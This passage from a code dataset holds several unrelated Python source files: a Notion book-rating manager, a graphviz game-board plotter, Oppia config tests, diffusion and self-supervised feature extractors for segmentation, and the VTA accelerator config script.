import Dict, List, Union\n\nfrom notion_client.errors import APIResponseError\nfrom tenacity import retry, retry_if_exception_type, stop_after_attempt, wait_fixed\n\nfrom normalizer import Normalizer\nfrom notion_db_API import NotionDBAPI\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nretry_decorator = retry(\n wait=wait_fixed(1),\n stop=stop_after_attempt(5),\n retry=retry_if_exception_type(APIResponseError),\n)\n\n\nclass BookManager:\n \"\"\"\n Manages the business logic for book entries in the Notion database.\n \"\"\"\n\n def __init__(self, api: NotionDBAPI):\n self.api = api\n self.database_id = api.database_id or os.getenv(\"NOTION_DATABASE_ID\")\n self.notion = api.notion\n\n @retry_decorator\n async def get_existing_ratings(self) -> Dict[str, Dict[str, Union[int, str]]]:\n \"\"\"\n Fetches existing ratings from the Notion database.\n\n Returns:\n Dict[str, Dict[str, Union[int, str]]]: A dictionary containing existing ratings.\n \"\"\"\n try:\n all_entries = await NotionDBAPI.fetch_paginated_results(\n self.notion.databases.query, database_id=self.database_id\n )\n return await self.get_existing_book_entries(all_entries)\n except APIResponseError as error:\n logger.error(f\"API Error ({error.code}): {error.body}\")\n return {}\n except Exception as error:\n logger.exception(f\"Unexpected error: {error}\")\n return {}\n\n @retry_decorator\n async def get_existing_book_entries(\n self, data: List[Dict[str, str]]\n ) -> Dict[str, str]:\n \"\"\"\n Extracts existing book entries from Notion database data.\n\n Args:\n data (List[Dict[str, str]]): List of database entries.\n\n Returns:\n Dict[str, str]: A dictionary containing existing book entries.\n \"\"\"\n existing_book_entries = {}\n for entry in data:\n book_title = Normalizer.normalize_name(\n entry[\"properties\"][\"Book Title\"][\"title\"][0][\"text\"][\"content\"]\n )\n\n existing_book_entries[book_title] = {\n \"pageId\": entry[\"id\"],\n \"rating\": entry[\"properties\"][\"Rating\"][\"number\"],\n \"favorites\": entry[\"properties\"][\"Favorites\"][\"number\"],\n \"least_favorites\": entry[\"properties\"][\"Least Favorites\"][\"number\"],\n }\n return existing_book_entries\n\n @retry_decorator\n async def upsert_books_to_database(\n self, new_ratings: Dict[str, Dict], existing_ratings: Dict[str, Dict]\n ) -> None:\n \"\"\"\n Update or add books in the database based on new ratings.\n\n Args:\n new_ratings (Dict[str, Dict]): Dictionary containing new ratings.\n existing_ratings (Dict[str, Dict]): Dictionary containing existing ratings.\n \"\"\"\n books_to_update = []\n books_to_add = []\n\n for book_title, book_stats in new_ratings.items():\n if book_title in existing_ratings:\n existing_entry = existing_ratings[book_title]\n\n differences = [\n book_stats[\"rating\"] != existing_entry.get(\"rating\", 0),\n book_stats[\"favorites\"] != existing_entry.get(\"favorites\", 0),\n book_stats[\"least_favorites\"]\n != existing_entry.get(\"least_favorites\", 0),\n ]\n\n if any(differences):\n updated_entry = {\n **book_stats,\n \"book\": book_title,\n \"pageId\": existing_entry[\"pageId\"],\n }\n\n books_to_update.append(updated_entry)\n else:\n new_entry = {**book_stats, \"book\": book_title}\n books_to_add.append(new_entry)\n\n for entry in books_to_update:\n await self.update_book(entry)\n\n for entry in books_to_add:\n await self.add_book(entry)\n\n @retry_decorator\n async def add_book(self, book_entry: Dict):\n \"\"\"\n Add a new book entry to the Notion database.\n\n Args:\n book_entry 
(Dict): A dictionary containing book entry data.\n \"\"\"\n try:\n return await self.api.add_page(await self.get_properties(book_entry))\n except APIResponseError as error:\n logger.error(f\"API Error ({error.code}): {error.body}\")\n except Exception as error:\n logger.exception(f\"Unexpected error: {error}\")\n\n @retry_decorator\n async def update_book(self, updated_book_entry: Dict):\n \"\"\"\n Update an existing book entry in the Notion database.\n\n Args:\n updated_book_entry (Dict): A dictionary containing updated book entry data.\n \"\"\"\n try:\n return await self.api.update_page(\n updated_book_entry[\"pageId\"],\n await self.get_properties(updated_book_entry),\n )\n except APIResponseError as error:\n logger.error(f\"API Error ({error.code}): {error.body}\")\n except Exception as error:\n logger.exception(f\"Unexpected error: {error}\")\n\n @retry_decorator\n async def delete_all_books(self):\n \"\"\"\n Delete all books from the Notion database.\n \"\"\"\n try:\n all_entries = await NotionDBAPI.fetch_paginated_results(\n self.api.query_database\n )\n for entry in all_entries:\n await self.api.archive_page(entry[\"id\"])\n except APIResponseError as error:\n logger.error(f\"API Error ({error.code}): {error.body}\")\n except Exception as error:\n logger.exception(f\"Unexpected error: {error}\")\n\n async def get_properties(\n self, book_entry: Dict[str, Union[str, float]]\n ) -> Dict[str, Dict]:\n \"\"\"\n Constructs the properties of a book entry for Notion.\n\n Args:\n book_entry (Dict[str, Union[str, float]]): A dictionary containing book entry data.\n\n Returns:\n Dict[str, Dict]: A dictionary containing the properties of a book entry for Notion.\n \"\"\"\n return {\n \"Book Title\": {\"title\": [{\"text\": {\"content\": book_entry[\"book\"]}}]},\n \"Rating\": {\"number\": book_entry[\"rating\"]},\n \"Favorites\": {\"number\": book_entry[\"favorites\"]},\n \"Least Favorites\": {\"number\": book_entry[\"least_favorites\"]},\n }\n\n\nasync def main():\n # Get the Notion API token from the environment variable\n token = os.getenv(\"NOTION_TOKEN\")\n\n # Print the last 4 characters of the token (for debugging)\n print(f\"Token: {token[-4:]}\")\n\n # Initialize the Notion database\n notion_databases = BookManager(NotionDBAPI())\n\n # Delete all books\n await notion_databases.delete_all_books()\n\n # Define new ratings\n new_ratings = {\n \"The Hobbit\": {\"rating\": 5, \"favorites\": 1},\n \"The Fellowship of the Ring\": {\"rating\": 5, \"favorites\": 1},\n }\n\n # Get the current database entries\n existing_ratings = await notion_databases.get_existing_ratings()\n\n # Update the database with new ratings\n await notion_databases.upsert_books_to_database(\n new_ratings=new_ratings, existing_ratings=existing_ratings\n )\n\n # Delete all books\n await notion_databases.delete_all_books()\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"ChocoTonic/notion_book_club_aggregator","sub_path":"src/book_manager.py","file_name":"book_manager.py","file_ext":"py","file_size_in_byte":7536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25804522953","text":"#!c:\\anaconda3\\python3\n\nimport game_models\nimport math\nfrom graphviz import Digraph\n\nclass GamePlotter:\n\n TYPE_COLORS = {\n game_models.PointType.capital:\"red\",\n game_models.PointType.city:\"yellow\",\n game_models.PointType.repeat:\"green\",\n game_models.PointType.skip:\"gray\",\n game_models.PointType.none:\"white\"\n }\n\n def plot_model(self, 
game_model : game_models.GameModel, radius=200):\n paths = game_model.extract_paths()\n\n coords = {}\n path_length = len(paths[0])\n for pos in range(path_length):\n x = radius * math.cos(pos*2*math.pi / path_length )\n y = radius * math.sin(pos*2*math.pi / path_length )\n coords[paths[0][pos].id] = {\"x\":x, \"y\":y}\n\n graph = Digraph(format='svg', engine=\"neato\")\n\n for pid in game_model.points:\n pos = \"%f,%f\" % (coords[pid][\"x\"], coords[pid][\"y\"]) if pid in coords else None\n fillcolor = self.TYPE_COLORS[game_model.points[pid].type]\n\n graph.node(pid, pos=pos, style=\"filled\", fillcolor=fillcolor, tooltip=game_model.getAnnotatedPid(pid))\n\n for pid in game_model.points:\n for connection in game_model.points[pid].connections:\n graph.edge(pid, connection.id)\n\n for pid in game_model.points:\n transition = game_model.points[pid].transition\n if transition is None:\n continue\n target_pid = game_model.points[pid].transition.id\n color = \"green\" if game_models.GameModel.pidToInt(pid) < game_models.GameModel.pidToInt(target_pid) else \"red\"\n graph.edge(pid, target_pid, color=color)\n\n graph.render('test')","repo_name":"Tomcat256/world-journey-game","sub_path":"PythonModel/game_visualization.py","file_name":"game_visualization.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23294352001","text":"from core.domain import config_domain\nfrom core.domain import config_services\nfrom core.tests import test_utils\nimport schema_utils_test\n\n\nclass ConfigPropertyRegistryTests(test_utils.GenericTestBase):\n \"\"\"Tests for the config property registry.\"\"\"\n\n def test_config_property_schemas_are_valid(self):\n for property_name in config_domain.Registry._config_registry: # pylint: disable=protected-access\n schema = config_domain.Registry.get_config_property(\n property_name).schema\n schema_utils_test.validate_schema(schema)\n\n\nclass DerivedConfigPropertyTests(test_utils.GenericTestBase):\n \"\"\"Tests for derived config properties (i.e., those that are not directly\n settable).\"\"\"\n\n def test_derived_config_properties_cannot_be_set_directly(self):\n self.signup(self.MODERATOR_EMAIL, self.MODERATOR_USERNAME)\n\n with self.assertRaisesRegexp(\n Exception,\n 'Cannot modify value of config property moderator_ids directly'\n ):\n config_services.set_property(\n self.MODERATOR_EMAIL, config_domain.MODERATOR_IDS.name,\n [self.get_user_id_from_email(self.MODERATOR_EMAIL)])\n\n def test_setting_derived_config_properties(self):\n self.signup(self.MODERATOR_EMAIL, self.MODERATOR_USERNAME)\n\n self.assertEqual(config_domain.MODERATOR_USERNAMES.value, [])\n self.assertEqual(config_domain.MODERATOR_IDS.value, [])\n\n self.set_moderators([self.MODERATOR_USERNAME])\n self.assertEqual(\n config_domain.MODERATOR_USERNAMES.value,\n [self.MODERATOR_USERNAME])\n self.assertEqual(\n config_domain.MODERATOR_IDS.value,\n [self.get_user_id_from_email(self.MODERATOR_EMAIL)])\n\n self.set_moderators([])\n self.assertEqual(config_domain.MODERATOR_USERNAMES.value, [])\n self.assertEqual(config_domain.MODERATOR_IDS.value, [])\n","repo_name":"zgchizi/oppia-uc","sub_path":"core/domain/config_domain_test.py","file_name":"config_domain_test.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21888953424","text":"import sys\nimport torch\nfrom torch import nn\nfrom typing import 
List\n\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n\ndef create_feature_extractor(model_type, **kwargs):\n \"\"\" Create the feature extractor for architecture. \"\"\"\n if model_type == 'ddpm':\n print(\"Creating DDPM Feature Extractor...\")\n feature_extractor = FeatureExtractorDDPM(**kwargs)\n elif model_type == 'mae':\n print(\"Creating MAE Feature Extractor...\")\n feature_extractor = FeatureExtractorMAE(**kwargs)\n elif model_type == 'swav':\n print(\"Creating SwAV Feature Extractor...\")\n feature_extractor = FeatureExtractorSwAV(**kwargs)\n elif model_type == 'swav_w2':\n print(\"Creating SwAVw2 Feature Extractor...\")\n feature_extractor = FeatureExtractorSwAVw2(**kwargs)\n else:\n raise Exception(f\"Wrong model type: {model_type}\")\n return feature_extractor\n\n\ndef save_tensors(module: nn.Module, features, name: str):\n \"\"\" Process and save activations in the module. \"\"\"\n if type(features) in [list, tuple]:\n features = [f.detach().float() if f is not None else None \n for f in features]\n setattr(module, name, features)\n elif isinstance(features, dict):\n features = {k: f.detach().float() for k, f in features.items()}\n setattr(module, name, features)\n else:\n setattr(module, name, features.detach().float())\n\n\ndef save_out_hook(self, inp, out):\n save_tensors(self, out, 'activations')\n return out\n\n\ndef save_input_hook(self, inp, out):\n save_tensors(self, inp[0], 'activations')\n return out\n\n\nclass FeatureExtractor(nn.Module):\n def __init__(self, model_path: str, input_activations: bool, **kwargs):\n ''' \n Parent feature extractor class.\n \n param: model_path: path to the pretrained model\n param: input_activations: \n If True, features are input activations of the corresponding blocks\n If False, features are output activations of the corresponding blocks\n '''\n super().__init__()\n self._load_pretrained_model(model_path, **kwargs)\n print(f\"Pretrained model is successfully loaded from {model_path}\")\n self.save_hook = save_input_hook if input_activations else save_out_hook\n self.feature_blocks = []\n\n def _load_pretrained_model(self, model_path: str, **kwargs):\n pass\n\n\nclass FeatureExtractorDDPM(FeatureExtractor):\n ''' \n Wrapper to extract features from pretrained DDPMs.\n \n :param steps: list of diffusion steps t.\n :param blocks: list of the UNet decoder blocks.\n '''\n \n def __init__(self, steps: List[int], blocks: List[int], **kwargs):\n super().__init__(**kwargs)\n self.steps = steps\n \n # Save decoder activations\n for idx, block in enumerate(self.model.output_blocks):\n if idx in blocks:\n block.register_forward_hook(self.save_hook)\n self.feature_blocks.append(block)\n\n def _load_pretrained_model(self, model_path, **kwargs):\n import inspect\n import guided_diffusion.guided_diffusion.dist_util as dist_util\n from guided_diffusion.guided_diffusion.script_util import create_model_and_diffusion\n\n # Needed to pass only expected args to the function\n argnames = inspect.getfullargspec(create_model_and_diffusion)[0]\n expected_args = {name: kwargs[name] for name in argnames}\n self.model, self.diffusion = create_model_and_diffusion(**expected_args)\n \n self.model.load_state_dict(\n dist_util.load_state_dict(model_path, map_location=\"cpu\")\n )\n self.model.to(dist_util.dev())\n if kwargs['use_fp16']:\n self.model.convert_to_fp16()\n self.model.eval()\n\n @torch.no_grad()\n def forward(self, x, noise=None):\n activations = []\n for t in self.steps:\n # Compute x_t and run DDPM\n t = torch.tensor([t]).to(x.device)\n 
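# q_sample produces the noised sample x_t for step t (in guided_diffusion,\n            # x_t = sqrt(alpha_bar_t) * x + sqrt(1 - alpha_bar_t) * noise); the hooked\n            # decoder blocks then capture activations during the UNet call below.\n            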
noisy_x = self.diffusion.q_sample(x, t, noise=noise)\n self.model(noisy_x, self.diffusion._scale_timesteps(t))\n\n # Extract activations\n for block in self.feature_blocks:\n activations.append(block.activations)\n block.activations = None\n\n # Per-layer list of activations [N, C, H, W]\n return activations\n\n\nclass FeatureExtractorMAE(FeatureExtractor):\n ''' \n Wrapper to extract features from pretrained MAE\n '''\n def __init__(self, num_blocks=12, **kwargs):\n super().__init__(**kwargs)\n\n # Save features from deep encoder blocks \n for layer in self.model.blocks[-num_blocks:]:\n layer.register_forward_hook(self.save_hook)\n self.feature_blocks.append(layer)\n\n def _load_pretrained_model(self, model_path, **kwargs):\n import mae\n from functools import partial\n sys.path.append(mae.__path__[0])\n from mae.models_mae import MaskedAutoencoderViT\n\n # Create MAE with ViT-L-8 backbone \n model = MaskedAutoencoderViT(\n img_size=256, patch_size=8, embed_dim=1024, depth=24, num_heads=16,\n decoder_embed_dim=512, decoder_depth=8, decoder_num_heads=16,\n mlp_ratio=4, norm_layer=partial(nn.LayerNorm, eps=1e-6), norm_pix_loss=True\n )\n\n checkpoint = torch.load(model_path, map_location='cpu')\n model.load_state_dict(checkpoint['model'])\n self.model = model.eval().to(device)\n\n @torch.no_grad()\n def forward(self, x, **kwargs):\n _, _, ids_restore = self.model.forward_encoder(x, mask_ratio=0)\n ids_restore = ids_restore.unsqueeze(-1)\n sqrt_num_patches = int(self.model.patch_embed.num_patches ** 0.5)\n activations = []\n for block in self.feature_blocks:\n # remove cls token \n a = block.activations[:, 1:]\n # unshuffle patches\n a = torch.gather(a, dim=1, index=ids_restore.repeat(1, 1, a.shape[2])) \n # reshape to obtain spatial feature maps\n a = a.permute(0, 2, 1)\n a = a.view(*a.shape[:2], sqrt_num_patches, sqrt_num_patches)\n\n activations.append(a)\n block.activations = None\n # Per-layer list of activations [N, C, H, W]\n return activations\n\n\nclass FeatureExtractorSwAV(FeatureExtractor):\n ''' \n Wrapper to extract features from pretrained SwAVs \n '''\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n layers = [self.model.layer1, self.model.layer2,\n self.model.layer3, self.model.layer4]\n\n # Save features from sublayers\n for layer in layers:\n for l in layer[::2]:\n l.register_forward_hook(self.save_hook)\n self.feature_blocks.append(l)\n\n def _load_pretrained_model(self, model_path, **kwargs):\n import swav\n sys.path.append(swav.__path__[0])\n from swav.hubconf import resnet50\n\n model = resnet50(pretrained=False).to(device).eval()\n model.fc = nn.Identity()\n model = torch.nn.DataParallel(model)\n state_dict = torch.load(model_path)['state_dict']\n model.load_state_dict(state_dict, strict=False) \n self.model = model.module.eval()\n\n @torch.no_grad()\n def forward(self, x, **kwargs):\n self.model(x)\n\n activations = []\n for block in self.feature_blocks:\n activations.append(block.activations)\n block.activations = None\n\n # Per-layer list of activations [N, C, H, W]\n return activations\n \n\nclass FeatureExtractorSwAVw2(FeatureExtractorSwAV):\n ''' \n Wrapper to extract features from twice wider pretrained SwAVs \n '''\n def _load_pretrained_model(self, model_path, **kwargs):\n import swav\n sys.path.append(swav.__path__[0])\n from swav.hubconf import resnet50w2\n\n model = resnet50w2(pretrained=False).to(device).eval()\n model.fc = nn.Identity()\n model = torch.nn.DataParallel(model)\n state_dict = torch.load(model_path)['state_dict']\n 
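# strict=False skips checkpoint keys with no counterpart in the bare\n        # ResNet-50 backbone (e.g. SwAV's projection head / prototype weights).\n        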
model.load_state_dict(state_dict, strict=False) \n self.model = model.module.eval()\n\n\ndef collect_features(args, activations: List[torch.Tensor], sample_idx=0):\n \"\"\" Upsample activations and concatenate them to form a feature tensor \"\"\"\n assert all([isinstance(acts, torch.Tensor) for acts in activations])\n size = tuple(args['dim'][:-1])\n resized_activations = []\n for feats in activations:\n feats = feats[sample_idx][None]\n feats = nn.functional.interpolate(\n feats, size=size, mode=args[\"upsample_mode\"]\n )\n resized_activations.append(feats[0])\n \n return torch.cat(resized_activations, dim=0)\n","repo_name":"yandex-research/ddpm-segmentation","sub_path":"src/feature_extractors.py","file_name":"feature_extractors.py","file_ext":"py","file_size_in_byte":8825,"program_lang":"python","lang":"en","doc_type":"code","stars":572,"dataset":"github-code","pt":"48"} +{"seq_id":"35382133309","text":"from rest_framework import viewsets\n\nfrom rest_framework.response import Response\nfrom .serializers import PatrimonioSerializers\n\nfrom compras.models import CompraModel\nfrom vendas.models import VendaModel\nfrom .models import PatrimonioModel\n\nfrom .relatorios.salvar_db import *\nfrom carteira.calculos.carteira_calc import Carteira\nfrom carteira.calculos.calc_vol import Volatilidade\n\nclass PatrimonioViews(viewsets.ModelViewSet):\n queryset = PatrimonioModel.objects.all()\n serializer_class = PatrimonioSerializers\n\n def list(self, request):\n queryset = self.queryset.filter(usuario = request.user)\n serializer = PatrimonioSerializers(queryset, many=True)\n return Response(serializer.data)\n\n def perform_create(self, serializer):\n serializer.save(usuario=self.request.user)\n\n\n\nclass RelatorioPatrimonioViews(viewsets.ViewSet):\n queryset = PatrimonioModel.objects.all()\n serializer_class = PatrimonioSerializers\n\n\n def list(self, request):\n compra_model_user = CompraModel.objects.filter(usuario=request.user)\n venda_model_user = VendaModel.objects.filter(usuario=request.user)\n carteira = Carteira(compra_model_user, venda_model_user)\n candle_carteira = carteira.candle_patrimonio_diario()\n vol = Volatilidade(candle_carteira, len(self.queryset))\n \n return Response(\n {\n 'volatilidade':vol.resposta_classe(),\n 'candle_carteira':candle_carteira,\n }\n )\n","repo_name":"ribeirosaimon/Planilha_Django","sub_path":"relatorio_carteira/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7004519064","text":"import os\nimport sys\nimport json\nimport argparse\n\n\ndef pkg_config(cfg):\n \"\"\"Returns PkgConfig pkg config object.\"\"\"\n pkg_config_py = os.path.join(\n os.path.dirname(os.path.abspath(os.path.expanduser(__file__))),\n \"pkg_config.py\"\n )\n libpkg = {\"__file__\": pkg_config_py}\n exec(compile(open(pkg_config_py, \"rb\").read(), pkg_config_py, \"exec\"), libpkg, libpkg)\n PkgConfig = libpkg[\"PkgConfig\"]\n return PkgConfig(cfg)\n\ndef gen_target_name(pkg):\n \"\"\"Emit target macro from config\"\"\"\n if pkg.TARGET == \"pynq\":\n return \"VTA_TARGET_PYNQ\"\n elif pkg.TARGET == \"de10nano\":\n return \"VTA_TARGET_DE10_NANO\"\n elif pkg.TARGET == \"ultra96\":\n return \"VTA_TARGET_ULTRA96\"\n elif pkg.TARGET == \"zcu104\":\n return \"VTA_TARGET_ZCU104\"\n else:\n return None\n\ndef gen_target_cflags(pkg):\n \"\"\"Emit target cflags from config\"\"\"\n cflags_str = \" \".join(pkg.cflags)\n target = gen_target_name(pkg)\n if 
target:\n        cflags_str += \" -D{}\".format(target)\n    return cflags_str\n\ndef calculate_num_wgt_uram(pkg):\n    \"\"\"Calculate number of weight uram from config\"\"\"\n    if hasattr(pkg, 'num_wgt_mem_uram'):\n        return pkg.num_wgt_mem_uram\n    else:\n        return 0\n\ndef gen_tcl_vivado(pkg, file):\n    \"\"\"Export variables to tcl file\"\"\"\n    const_func = \"\"\"proc const {name value} {\n    uplevel 1 [list set $name $value]\n    uplevel 1 [list trace var $name w {error constant ;#} ]\n}\"\"\"\n    with open(file, \"w\") as fo:\n        fo.write(const_func)\n        fo.write(\"\\nconst CFLAGS \\\"{}\\\"\".format(gen_target_cflags(pkg)))\n        fo.write(\"\\nconst TARGET {}\".format(pkg.TARGET))\n        fo.write(\"\\nconst FPGA_DEVICE {}\".format(pkg.fpga_device))\n        fo.write(\"\\nconst FPGA_FAMILY {}\".format(pkg.fpga_family))\n        fo.write(\"\\nconst FPGA_BOARD {}\".format(pkg.fpga_board))\n        fo.write(\"\\nconst FPGA_BOARD_REV {}\".format(pkg.fpga_board_rev))\n        fo.write(\"\\nconst FPGA_PERIOD {}\".format(pkg.fpga_per))\n        fo.write(\"\\nconst FPGA_FREQ {}\".format(pkg.fpga_freq))\n        fo.write(\"\\nconst INP_MEM_AXI_RATIO {}\".format(pkg.inp_mem_axi_ratio))\n        fo.write(\"\\nconst WGT_MEM_AXI_RATIO {}\".format(pkg.wgt_mem_axi_ratio))\n        fo.write(\"\\nconst OUT_MEM_AXI_RATIO {}\".format(pkg.out_mem_axi_ratio))\n        fo.write(\"\\nconst INP_MEM_BANKS {}\".format(pkg.inp_mem_banks))\n        fo.write(\"\\nconst WGT_MEM_BANKS {}\".format(pkg.wgt_mem_banks))\n        fo.write(\"\\nconst OUT_MEM_BANKS {}\".format(pkg.out_mem_banks))\n        fo.write(\"\\nconst INP_MEM_WIDTH {}\".format(pkg.inp_mem_width))\n        fo.write(\"\\nconst WGT_MEM_WIDTH {}\".format(pkg.wgt_mem_width))\n        fo.write(\"\\nconst OUT_MEM_WIDTH {}\".format(pkg.out_mem_width))\n        fo.write(\"\\nconst INP_MEM_DEPTH {}\".format(pkg.inp_mem_depth))\n        fo.write(\"\\nconst WGT_MEM_DEPTH {}\".format(pkg.wgt_mem_depth))\n        fo.write(\"\\nconst OUT_MEM_DEPTH {}\".format(pkg.out_mem_depth))\n        fo.write(\"\\nconst NUM_WGT_MEM_URAM {}\".format(calculate_num_wgt_uram(pkg)))\n        fo.write(\"\\nconst AXI_CACHE_BITS {}\".format(pkg.axi_cache_bits))\n        fo.write(\"\\nconst AXI_PROT_BITS {}\".format(pkg.axi_prot_bits))\n        fo.write(\"\\nconst IP_REG_MAP_RANGE {}\".format(pkg.ip_reg_map_range))\n        fo.write(\"\\nconst FETCH_BASE_ADDR {}\".format(pkg.fetch_base_addr))\n        fo.write(\"\\nconst LOAD_BASE_ADDR {}\".format(pkg.load_base_addr))\n        fo.write(\"\\nconst COMPUTE_BASE_ADDR {}\".format(pkg.compute_base_addr))\n        fo.write(\"\\nconst STORE_BASE_ADDR {}\".format(pkg.store_base_addr))\n\ndef main():\n    \"\"\"Main function\"\"\"\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--use-cfg\", type=str, default=\"\",\n                        help=\"path to the config json\")\n    parser.add_argument(\"--cflags\", action=\"store_true\",\n                        help=\"print the cflags\")\n    parser.add_argument(\"--defs\", action=\"store_true\",\n                        help=\"print the macro defs\")\n    parser.add_argument(\"--sources\", action=\"store_true\",\n                        help=\"print the source file paths\")\n    parser.add_argument(\"--update\", action=\"store_true\",\n                        help=\"Print out the json option.\")\n    parser.add_argument(\"--ldflags\", action=\"store_true\",\n                        help=\"print the ldflags\")\n    parser.add_argument(\"--cfg-json\", action=\"store_true\",\n                        help=\"print all the config json\")\n    parser.add_argument(\"--save-cfg-json\", type=str, default=\"\",\n                        help=\"save config json to file\")\n    parser.add_argument(\"--target\", action=\"store_true\",\n                        help=\"print the target\")\n    parser.add_argument(\"--cfg-str\", action=\"store_true\",\n                        help=\"print the configuration string\")\n    parser.add_argument(\"--get-inp-mem-banks\", 
action=\"store_true\",\n help=\"returns number of input memory banks\")\n parser.add_argument(\"--get-inp-mem-width\", action=\"store_true\",\n help=\"returns input memory read/write port width\")\n parser.add_argument(\"--get-inp-mem-depth\", action=\"store_true\",\n help=\"returns input memory depth\")\n parser.add_argument(\"--get-inp-mem-axi-ratio\", action=\"store_true\",\n help=\"returns ratio between input element width and axi width\")\n parser.add_argument(\"--get-wgt-mem-banks\", action=\"store_true\",\n help=\"returns number of weight memory banks\")\n parser.add_argument(\"--get-wgt-mem-width\", action=\"store_true\",\n help=\"returns weight memory read/write port width\")\n parser.add_argument(\"--get-wgt-mem-depth\", action=\"store_true\",\n help=\"returns weight memory depth\")\n parser.add_argument(\"--get-wgt-mem-axi-ratio\", action=\"store_true\",\n help=\"returns ratio between weight element width and axi width\")\n parser.add_argument(\"--get-out-mem-banks\", action=\"store_true\",\n help=\"returns number of output memory banks\")\n parser.add_argument(\"--get-out-mem-width\", action=\"store_true\",\n help=\"returns output memory read/write port width\")\n parser.add_argument(\"--get-out-mem-depth\", action=\"store_true\",\n help=\"returns output memory depth\")\n parser.add_argument(\"--get-out-mem-axi-ratio\", action=\"store_true\",\n help=\"returns ratio between output element width and axi width\")\n parser.add_argument(\"--get-num-wgt-mem-uram\", action=\"store_true\",\n help=\"returns number of weight memory blocks to be implemented on URAM\")\n parser.add_argument(\"--get-axi-cache-bits\", action=\"store_true\",\n help=\"returns AXI system ARCACHE/AWCACHE hardcoded bit value\")\n parser.add_argument(\"--get-axi-prot-bits\", action=\"store_true\",\n help=\"returns AXI system ARPROT/AWPROT hardcoded bit value\")\n parser.add_argument(\"--get-ip-reg-map-range\", action=\"store_true\",\n help=\"returns ip register map address range\")\n parser.add_argument(\"--get-fetch-base-addr\", action=\"store_true\",\n help=\"returns fetch module base address\")\n parser.add_argument(\"--get-load-base-addr\", action=\"store_true\",\n help=\"returns load module base address\")\n parser.add_argument(\"--get-compute-base-addr\", action=\"store_true\",\n help=\"returns compute module base address\")\n parser.add_argument(\"--get-store-base-addr\", action=\"store_true\",\n help=\"returns store module base address\")\n parser.add_argument(\"--get-fpga-dev\", action=\"store_true\",\n help=\"returns FPGA device target\")\n parser.add_argument(\"--get-fpga-board\", action=\"store_true\",\n help=\"returns FPGA board\")\n parser.add_argument(\"--get-fpga-board-rev\", action=\"store_true\",\n help=\"returns FPGA board version\")\n parser.add_argument(\"--get-fpga-family\", action=\"store_true\",\n help=\"returns FPGA device family\")\n parser.add_argument(\"--get-fpga-freq\", action=\"store_true\",\n help=\"returns FPGA frequency\")\n parser.add_argument(\"--get-fpga-per\", action=\"store_true\",\n help=\"returns HLS target clock period\")\n parser.add_argument(\"--export-tcl\", type=str, default=\"\",\n help=\"export variables to tcl file\")\n args = parser.parse_args()\n\n if len(sys.argv) == 1:\n parser.print_help()\n return\n\n # Path to vta config\n curr_path = os.path.dirname(\n os.path.abspath(os.path.expanduser(__file__)))\n\n path_list = [\n \"vta_config.json\", os.path.join(curr_path, \"vta_config.json\")\n ]\n\n if args.use_cfg:\n path_list = [args.use_cfg]\n\n ok_path_list = [p 
for p in path_list if os.path.exists(p)]\n if not ok_path_list:\n raise RuntimeError(\"Cannot find config in %s\" % str(path_list))\n\n cfg = json.load(open(ok_path_list[0]))\n pkg = pkg_config(cfg)\n\n if args.target:\n print(pkg.TARGET)\n\n if args.defs:\n print(\" \".join(pkg.macro_defs))\n\n if args.sources:\n print(\" \".join(pkg.lib_source))\n\n if args.cflags:\n print(gen_target_cflags(pkg))\n\n if args.ldflags:\n print(\" \".join(pkg.ldflags))\n\n if args.cfg_json:\n print(pkg.cfg_json)\n\n if args.save_cfg_json:\n with open(args.save_cfg_json, \"w\") as fo:\n fo.write(pkg.cfg_json)\n\n if args.cfg_str:\n print(pkg.TARGET + \"_\" + pkg.bitstream)\n\n if args.get_inp_mem_banks:\n print(pkg.inp_mem_banks)\n\n if args.get_inp_mem_width:\n print(pkg.inp_mem_width)\n\n if args.get_inp_mem_depth:\n print(pkg.inp_mem_depth)\n\n if args.get_inp_mem_axi_ratio:\n print(pkg.inp_mem_axi_ratio)\n\n if args.get_wgt_mem_banks:\n print(pkg.wgt_mem_banks)\n\n if args.get_wgt_mem_width:\n print(pkg.wgt_mem_width)\n\n if args.get_wgt_mem_depth:\n print(pkg.wgt_mem_depth)\n\n if args.get_wgt_mem_axi_ratio:\n print(pkg.wgt_mem_axi_ratio)\n\n if args.get_out_mem_banks:\n print(pkg.out_mem_banks)\n\n if args.get_out_mem_width:\n print(pkg.out_mem_width)\n\n if args.get_out_mem_depth:\n print(pkg.out_mem_depth)\n\n if args.get_out_mem_axi_ratio:\n print(pkg.out_mem_axi_ratio)\n\n if args.get_num_wgt_mem_uram:\n print(calculate_num_wgt_uram(pkg))\n\n if args.get_axi_cache_bits:\n print(pkg.axi_cache_bits)\n\n if args.get_axi_prot_bits:\n print(pkg.axi_prot_bits)\n\n if args.get_ip_reg_map_range:\n print(pkg.ip_reg_map_range)\n\n if args.get_fetch_base_addr:\n print(pkg.fetch_base_addr)\n\n if args.get_load_base_addr:\n print(pkg.load_base_addr)\n\n if args.get_compute_base_addr:\n print(pkg.compute_base_addr)\n\n if args.get_store_base_addr:\n print(pkg.store_base_addr)\n\n if args.get_fpga_dev:\n print(pkg.fpga_device)\n\n if args.get_fpga_family:\n print(pkg.fpga_family)\n\n if args.get_fpga_board:\n print(pkg.fpga_board)\n\n if args.get_fpga_board_rev:\n print(pkg.fpga_board_rev)\n\n if args.get_fpga_freq:\n print(pkg.fpga_freq)\n\n if args.get_fpga_per:\n print(pkg.fpga_per)\n\n if args.export_tcl:\n gen_tcl_vivado(pkg, args.export_tcl)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"apache/tvm-vta","sub_path":"config/vta_config.py","file_name":"vta_config.py","file_ext":"py","file_size_in_byte":11430,"program_lang":"python","lang":"en","doc_type":"code","stars":214,"dataset":"github-code","pt":"48"} 